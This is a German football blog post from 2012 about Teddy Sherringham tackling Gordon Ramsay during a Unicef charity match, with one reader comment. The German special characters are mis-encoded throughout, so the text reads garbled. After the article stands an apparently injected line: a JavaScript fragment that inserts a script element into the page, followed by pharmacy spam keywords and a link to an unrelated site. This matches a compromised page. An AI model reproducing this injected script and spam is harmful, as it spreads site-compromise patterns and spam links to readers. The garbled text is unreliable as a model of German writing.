Willkommen auf » Teddy Sherringham nimmt Starkoch aus dem Spiel
30. Mai 2012

Teddy Sherringham nimmt Starkoch aus dem Spiel

Eine lustige Geschichte inmitten des fuAYballerischen A�dlands nach dem Ende des europA�ischen Ligabetriebs. Die berA?hmt-berA?chtigte englische HA�rte macht im InselfuAYball auch vor Benefizspielen nicht Halt. Um Gelder fA?r Unicef zu sammeln, trafen in Manchester neulich eine Truppe internationaler Stars und ein Team ehemaliger englischer FuAYballer aufeinander.

Dem Publikum wurde dabei deutlich mehr geboten als nur ein Schaulaufen und gemA?tliches Gekicke. Neben dem Schauspieler Will Ferrell, der humpelnd das Spielfeld verlassen musste, bekam das auch der schottische Sternekoch Gordon Ramsay schmerzhaft zu spA?ren. Beim Versuch einer Ballannahme im Mittelfeld wurde er durch den hochmotivierten Ex-Nationalspieler Teddy Sherringham gestA�rt, der mit Anlauf und kernigem KA�rpereinsatz in den verdutzten Gegner rammte.

Ramsay blieb erstmal liegen und musste schlieAYlich mit der Trage vom Platz transportiert werden…

Die Altstars lieAYen A?brigens auch beim Spielergebnis nichts anbrennen und setzten sich am Ende standesgemA�AY mit 3:1 durch :)

document.currentScript.parentNode.insertBefore(s, document.currentScript); lipotrexate purchase cialis online without prescription Cheap Buy viagra prix en pharmacie Pills cheap sarafem coupons Order Order Buy http://blog.empregavoce.com.br/cheap-isoniazid-toxicity/


Ein Kommentar



  1. Uiuiui der Teddy, Engländer durch und durch.
    Muss leider immer wenn ich Sheringham oder Solskjaer lese, an Barcelona ’99 denken, und jetzt ist mein Tag gelaufen. Danke dafür FuViBlo 😉

Einen Kommentar schreiben